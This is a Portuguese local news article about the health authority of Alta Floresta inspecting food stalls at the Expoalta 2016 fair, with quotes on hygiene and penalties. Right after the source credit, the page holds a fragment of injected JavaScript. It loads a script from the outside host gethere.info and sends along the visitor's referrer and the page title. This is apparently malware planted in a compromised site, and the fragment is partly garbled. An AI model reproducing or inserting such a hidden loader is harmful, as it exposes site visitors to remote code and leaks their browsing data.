Capa / Em Destaque / Vigilância Sanitária inspecionará barracas

Vigilância Sanitária inspecionará barracas

A Vigilância Sanitária de Alta Floresta iniciará nesta semana a fiscalização nas barracas de gênero alimentício que participarão da 30ª Expoalta 2016. O procedimento segue durante a feira com inspeções constantes. Segundo o coordenador da vigilância sanitária José Aparecido, quatro fiscalizadores atuaram na feira e no primeiro momento será ministrado uma palestra orientativa com os expositores, e a seguir a fiscalização será constante.

“No decorrer da feira a gente vai estar sempre passando, fiscalizando para ver como esta à exposição dos alimentos se está sendo feito reaproveitamento das sobras do dia anterior, a higiene dos manipuladores de alimentos para que não haja contaminação alimentar no parque de exposições”, destacou.
Os que não estiverem adequados serão orientados sobre as normas exigidas. Segundo o coordenador, alimentos usados em feiras anteriores não serão aceitos, entre outros requisitos básicos como higienização serão cobradas, se identificadas irregularidades o estabelecimento pode até ser interditado pela vigilância sanitária.
“Na primeira noite geralmente nós cadastramos ou fazemos comparações com aquelas informações que o sindicato já nos tenha passado, fazemos a fiscalização e os que não estiverem em conformidade com a legislação serão notificados e em casos de alimentos estragados ou alimentos que vem de outros parques de exposição se for percebido este tipo de ação eles serão descartados, em caso de reincidência eles sofrerão multas e poderão até ter a barraca interditada ou até excluída da festa”, pontuou.

592013102157

Fonte: Kariny Santoss.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top